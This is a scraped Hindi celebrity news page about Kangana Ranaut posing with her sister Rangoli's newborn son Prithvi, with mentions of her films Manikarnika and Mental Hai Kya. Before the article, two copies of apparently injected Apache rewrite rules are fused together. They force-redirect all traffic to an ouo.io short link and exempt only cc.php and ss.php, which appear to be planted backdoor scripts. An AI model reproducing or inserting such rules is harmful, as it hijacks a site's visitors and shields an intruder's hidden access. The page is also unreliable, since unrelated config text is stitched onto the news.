
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 358
Previous Nextमुंबई। कंगना रनौत एक भांजे की मौसी बन चुकी हैं। उनकी बहन रंगोली ने नवंबर महीने में बेटे को जन्म दिया था। उसका नाम उन्होंने पृथ्वी रखा। तभी से वो ट्विटर पर अपने बच्चे की तस्वीरें शेयर करती रहती हैं। लेकिन कलपहली बार ऐसा हुआ कि पृथ्वी के साथ मम्मी रंगोली नहीं मौसी कंगना के क्यूट पोज देखने को मिले। एक तस्वीर में कंगना पृथ्वी को किस करती नजर आ रही हैं। पृथ्वी भी मौसी कंगना की कंपनी में काफी खुश दिख रहा है।
कंगना रनौत की बहन रंगोली ने 16 नवंबर को पृथ्वी को जन्म दिया था। उन्होंने ट्विटर पर न्यूबॉर्न बेबी बॉय पृथ्वी की तस्वीर शेयर करते हुए कुछ ही समय बाद इसकी जानकारी भी दी थी। रंगोली और कंगना एक-दूसरे के काफी करीब हैं। रितिक से विवाद होने की बात हो या किसी फिल्म की रंगोली हमेशा कंगना के साथ खड़ी नजर आती हैं। वैसे कंगना इन दिनों अपनी आने वाली फिल्म मणिकर्णिका में व्यस्त हैं। इसमें वह झांसी की रानी लक्ष्मीबाई का रोल निभा रही हैं। फिल्म की प्रोड्यूसर भी वह खुद ही हैं। इसके साथ ही उन्होंने एकता कपूर की अगली फिल्म मेंटल है क्या की शूटिंग भी शुरू कर दी है। इसमें उनके साथ राजकुमार राव मुख्य भूमिका में हैं।